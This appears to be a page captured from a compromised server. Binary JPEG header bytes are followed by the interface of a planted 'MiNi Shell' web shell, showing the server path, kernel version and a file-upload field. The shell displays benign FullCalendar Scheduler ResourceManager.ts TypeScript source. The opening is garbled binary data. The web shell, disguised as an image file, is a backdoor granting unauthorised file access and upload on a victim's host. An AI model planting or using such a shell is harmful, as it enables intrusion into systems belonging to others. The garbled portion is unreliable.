JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/vendor/bower-asset/fullcalendar-scheduler/src/models/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/vendor/bower-asset/fullcalendar-scheduler/src/models/ResourceManager.ts

import * as $ from 'jquery'
import { Class, Promise, EmitterMixin, EmitterInterface, BusinessHourGenerator } from 'fullcalendar'


export default class ResourceManager extends Class {

  static resourceGuid = 1
  static ajaxDefaults = {
    dataType: 'json',
    cache: false
  }

  on: EmitterInterface['on']
  one: EmitterInterface['one']
  off: EmitterInterface['off']
  trigger: EmitterInterface['trigger']
  triggerWith: EmitterInterface['triggerWith']
  hasHandlers: EmitterInterface['hasHandlers']

  calendar: any
  fetchId: number
  topLevelResources: any // if null, indicates not fetched
  resourcesById: any
  fetching: any // a promise. the last fetch. never cleared afterwards
  currentStart: any
  currentEnd: any


  constructor(calendar) {
    super()
    this.fetchId = 0
    this.calendar = calendar
    this.initializeCache()
  }


  // Resource Data Getting
  // ------------------------------------------------------------------------------------------------------------------


  /*
  Like fetchResources, but won't refetch if already fetched.
  */
  getResources(start, end) {
    const isSameRange =
      (!start && !this.currentStart) || // both nonexistent ranges?
      (start && this.currentStart && start.isSame(this.currentStart) && end.isSame(this.currentEnd))

    if (!this.fetching || !isSameRange) { // first time? or is range different?
      return this.fetchResources(start, end)
    } else {
      return this.fetching
    }
  }


  /*
  Will always fetch, even if done previously.
  Accepts optional chrono-related params to pass on to the raw resource sources.
  Returns a promise.
  */
  fetchResources(start, end) {
    const currentFetchId = (this.fetchId += 1)

    return this.fetching =
      Promise.construct((resolve, reject) => {
        this.fetchResourceInputs(resourceInputs => {
          if (currentFetchId === this.fetchId) {
            this.setResources(resourceInputs)
            return resolve(this.topLevelResources)
          } else {
            return reject()
          }
        }, start, end)
      })
  }


  /*
  Accepts optional chrono-related params to pass on to the raw resource sources.
  Calls callback when done.
  */
  fetchResourceInputs(callback, start, end) {
    const { calendar } = this
    let source = calendar.opt('resources')
    const timezone = calendar.opt('timezone')

    if ($.type(source) === 'string') {
      source = { url: source }
    }

    switch ($.type(source)) {

      case 'function':
        this.calendar.pushLoading()
        source((resourceInputs) => {
          this.calendar.popLoading()
          callback(resourceInputs)
        }, start, end, calendar.opt('timezone'))
        break

      case 'object':
        calendar.pushLoading()
        let requestParams = {}

        if (start && end) {
          requestParams[calendar.opt('startParam')] = start.format()
          requestParams[calendar.opt('endParam')] = end.format()

          // mimick what EventManager does
          // TODO: more DRY
          if (timezone && (timezone !== 'local')) {
            requestParams[calendar.opt('timezoneParam')] = timezone
          }
        }

        $.ajax( // TODO: handle failure
          $.extend(
            { data: requestParams },
            ResourceManager.ajaxDefaults,
            source
          )
        ).then(resourceInputs => {
          calendar.popLoading()
          callback(resourceInputs)
        })

        break

      case 'array':
        callback(source)
        break

      default:
        callback([])
        break
    }
  }


  getResourceById(id) { // assumes already returned from fetch
    return this.resourcesById[id]
  }


  // assumes already completed fetch
  // does not guarantee order
  getFlatResources() {
    const result = []

    for (let id in this.resourcesById) {
      result.push(this.resourcesById[id])
    }

    return result
  }


  // Resource Adding
  // ------------------------------------------------------------------------------------------------------------------


  initializeCache() {
    this.topLevelResources = []
    this.resourcesById = {}
  }


  setResources(resourceInputs) {
    let resource
    const wasSet = Boolean(this.topLevelResources)
    this.initializeCache()

    const resources = resourceInputs.map((resourceInput) => (
      this.buildResource(resourceInput)
    ))

    const validResources = []

    for (resource of resources) {
      if (this.addResourceToIndex(resource)) {
        validResources.push(resource)
      }
    }

    for (resource of validResources) {
      this.addResourceToTree(resource)
    }

    if (wasSet) {
      this.trigger('reset', this.topLevelResources)
    } else {
      this.trigger('set', this.topLevelResources)
    }

    this.calendar.publiclyTrigger('resourcesSet', [ this.topLevelResources ])
  }


  resetCurrentResources() { // resend what we already have
    if (this.topLevelResources) {
      this.trigger('reset', this.topLevelResources)
    }
  }


  clear() {
    this.topLevelResources = null
    this.fetching = null
  }


  addResource(resourceInput) { // returns a promise
    if (this.fetching) {
      return this.fetching.then(() => { // wait for initial batch of resources
        const resource = this.buildResource(resourceInput)
        if (this.addResourceToIndex(resource)) {
          this.addResourceToTree(resource)
          this.trigger('add', resource , this.topLevelResources)
          return resource
        } else {
          return false
        }
      })
    } else {
      return Promise.reject()
    }
  }


  addResourceToIndex(resource) {
    if (this.resourcesById[resource.id]) {
      return false
    } else {
      this.resourcesById[resource.id] = resource

      for (let child of resource.children) {
        this.addResourceToIndex(child)
      }

      return true
    }
  }


  addResourceToTree(resource) {
    if (!resource.parent) {
      let siblings
      const parentId = String(resource['parentId'] != null ? resource['parentId'] : '')

      if (parentId) {
        const parent = this.resourcesById[parentId]
        if (parent) {
          resource.parent = parent
          siblings = parent.children
        } else {
          return false
        }
      } else {
        siblings = this.topLevelResources
      }

      siblings.push(resource)
    }

    return true
  }


  // Resource Removing
  // ------------------------------------------------------------------------------------------------------------------


  removeResource(idOrResource) {
    const id =
      typeof idOrResource === 'object' ?
        idOrResource.id :
        idOrResource

    if (this.fetching) {
      return this.fetching.then(() => { // wait for initial batch of resources
        const resource = this.removeResourceFromIndex(id)

        if (resource) {
          this.removeResourceFromTree(resource)
          this.trigger('remove', resource, this.topLevelResources)
        }

        return resource
      })
    } else {
      return Promise.reject()
    }
  }


  removeResourceFromIndex(resourceId) {
    const resource = this.resourcesById[resourceId]

    if (resource) {
      delete this.resourcesById[resourceId]

      for (let child of resource.children) {
        this.removeResourceFromIndex(child.id)
      }

      return resource
    } else {
      return false
    }
  }


  removeResourceFromTree(resource, siblings = this.topLevelResources) {

    for (let i = 0; i < siblings.length; i++) {
      const sibling = siblings[i]

      if (sibling === resource) {
        resource.parent = null
        siblings.splice(i, 1)
        return true
      }

      if (this.removeResourceFromTree(resource, sibling.children)) {
        return true
      }
    }

    return false
  }


  // Resource Data Utils
  // ------------------------------------------------------------------------------------------------------------------


  buildResource(resourceInput) {
    const resource = $.extend({}, resourceInput)
    const rawClassName = resourceInput.eventClassName

    resource.id = String(
      resourceInput.id != null ?
        resourceInput.id :
        '_fc' + (ResourceManager.resourceGuid++)
    )

    // TODO: consolidate repeat logic
    resource.eventClassName = (function() {
      switch ($.type(rawClassName)) {
        case 'string':
          return rawClassName.split(/\s+/)
        case 'array':
          return rawClassName
        default:
          return []
      }
    })()

    if (resourceInput.businessHours) {
      resource.businessHourGenerator = new BusinessHourGenerator(resourceInput.businessHours, this.calendar)
    }

    resource.children = (resourceInput.children || []).map((childInput) => {
      const child = this.buildResource(childInput)
      child.parent = resource
      return child
    })

    return resource
  }

}

EmitterMixin.mixInto(ResourceManager)

Creat By MiNi SheLL
Email: jattceo@gmail.com